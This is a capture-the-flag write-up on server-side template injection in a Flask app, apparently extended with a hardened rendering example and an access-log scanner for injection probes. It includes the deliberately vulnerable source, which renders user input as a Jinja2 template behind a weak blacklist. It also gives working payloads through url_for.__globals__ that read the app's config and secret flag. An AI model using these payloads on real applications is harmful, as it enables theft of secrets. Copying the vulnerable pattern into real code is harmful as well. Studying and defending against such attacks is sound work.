Source code

import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)
Note the following line: the FLAG is stored in this app's config, so it can be read from there.

app.config['FLAG'] = os.environ.pop('FLAG')
This code clearly tells us that SSTI exists: the user-controlled path segment is passed straight to render_template_string as the template source.

@app.route('/shrine/<path:shrine>')
def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    return flask.render_template_string(safe_jinja(shrine))
There is filtering, so let's audit it:

s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

The replace() calls strip every ( and ) from the input, and the next line prepends a {% set ... %} statement for each blacklisted name, setting config and self to None so that the template cannot read them directly.
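The filter above only rewrites the string; the real problem is that user input is used as the template source at all. The following is an added example (not code from the challenge or the writeup) that puts the challenge's safe_jinja filter beside a hardened rendering function. It uses jinja2 directly instead of a Flask app so it runs stand-alone; the function names render_as_template and render_as_data are mine.

```python
# Added example: vulnerable rendering pattern vs. hardened pattern, using
# jinja2 directly (no Flask app needed). Function names are assumptions.
from jinja2 import Environment

# autoescape=True matches what Flask enables for HTML templates.
env = Environment(autoescape=True)


def safe_jinja(s):
    """The challenge's filter, reproduced here only for comparison."""
    s = s.replace('(', '').replace(')', '')
    blacklist = ['config', 'self']
    return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s


def render_as_template(user_input):
    """Vulnerable: user input IS the template source, so {{ ... }} is evaluated.

    The blacklist prefix only shadows two names; every other name and any
    attribute traversal the template engine permits remains reachable.
    """
    return env.from_string(safe_jinja(user_input)).render()


def render_as_data(user_input):
    """Hardened: the template source is a constant written by the developer;
    user input is passed as a variable VALUE, which Jinja2 never parses.
    With autoescaping on, HTML metacharacters are escaped as well."""
    return env.from_string('{{ shrine }}').render(shrine=user_input)


if __name__ == '__main__':
    probe = '{{ 7 * 7 }}'
    print('as template:', render_as_template(probe))   # expression is evaluated
    print('as data:    ', render_as_data(probe))       # text is echoed literally
```

The fix is not a better blacklist: keep template source fully developer-controlled and pass untrusted text only through the render context. In a Flask view that means render_template_string('{{ shrine }}', shrine=shrine) or, better, a template file.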
The approach is to inject through two functions that are available in the template context by default:

url_for
get_flashed_messages()

/shrine/{{url_for.__globals__}}
/shrine/{{url_for.__globals__['current_app'].config}}
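From the defender's side, requests of the shape shown above are easy to spot in access logs: the path carries Jinja2 delimiters, dunder attribute names and context helpers such as url_for, usually percent-encoded. The following is an added example (not from the writeup) of a small log scanner that URL-decodes each request path, including double-encoded ones, and reports which indicators it finds. The log lines are constructed for the demo and the pattern list is my own choice.

```python
# Added example: detect template-injection probes in web access logs.
# Log lines below are constructed; the indicator list is an assumption.
import re
from urllib.parse import unquote

# Indicators of Jinja2 syntax or Python-internal traversal inside a URL path.
PATTERNS = [
    re.compile(r"\{\{|\{%"),                                   # {{ expr }} / {% stmt %}
    re.compile(r"__\w+__"),                                    # __globals__, __class__, ...
    re.compile(r"\b(url_for|get_flashed_messages|current_app)\b"),  # Flask context helpers
]

# Common Log Format: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def decode_path(path, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised.
    Bounded so a pathological input cannot loop forever."""
    prev = None
    for _ in range(max_rounds):
        if path == prev:
            break
        prev, path = path, unquote(path)
    return path


def ssti_indicators(path):
    """Return the pattern strings that match the decoded path."""
    decoded = decode_path(path)
    return [p.pattern for p in PATTERNS if p.search(decoded)]


def scan_log(lines):
    """Parse each log line and collect the requests carrying SSTI indicators."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash the scan
        found = ssti_indicators(m.group("path"))
        if found:
            hits.append({
                "ip": m.group("ip"),
                "path": decode_path(m.group("path")),
                "indicators": found,
                "status": int(m.group("status")),
            })
    return hits


# Constructed sample log: two benign requests, one encoded probe, one
# double-encoded probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Sep/2018:12:00:01 +0000] "GET / HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Sep/2018:12:00:02 +0000] "GET /shrine/hello HTTP/1.1" 200 5',
    '10.0.0.9 - - [10/Sep/2018:12:00:03 +0000] "GET /shrine/%7B%7Burl_for.__globals__%7D%7D HTTP/1.1" 200 4096',
    '10.0.0.9 - - [10/Sep/2018:12:00:04 +0000] "GET /shrine/%257B%257B7*7%257D%257D HTTP/1.1" 200 2',
]

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["path"], hit["indicators"])
```

A 200 status on a flagged request is the signal that matters most: the server rendered the probe rather than rejecting it. The bare-word pattern is deliberately narrow (config is left out) to avoid flagging ordinary paths such as /config.json.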
Some articles that help with understanding this challenge:

The role of underscores in Python
Some magic methods